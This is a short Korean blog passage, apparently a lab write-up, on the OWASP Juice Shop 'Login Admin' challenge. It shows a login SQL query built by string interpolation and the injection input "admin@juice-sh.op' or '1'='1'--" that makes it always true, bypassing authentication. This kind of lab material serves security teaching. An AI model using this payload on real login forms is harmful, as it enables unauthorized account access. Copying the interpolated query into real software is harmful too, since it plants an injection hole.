728x90 반응형 injection1 OWASP Juice Shop - Login Admin (Injection) 만일 로그인 쿼리문이 아래와 같다. SELECT * FROM Users WHERE email = '${req.body.email || ''}' AND password = '${security.hash(req.body.password || '')}' AND deletedAt IS NULL "admin@juice-sh.op' or '1'='1'--"를 입력한다면 SELECT * FROM Users WHERE email = 'admin@juice-sh.op' or '1'='1'--' AND password = '${security.hash(req.body.password || '')}' AND deletedAt IS NULL 쿼리문의 결과가 참이 되면서 로그인이 성공한다. 2023. 9. 27. 이전 1 다음 728x90 반응형
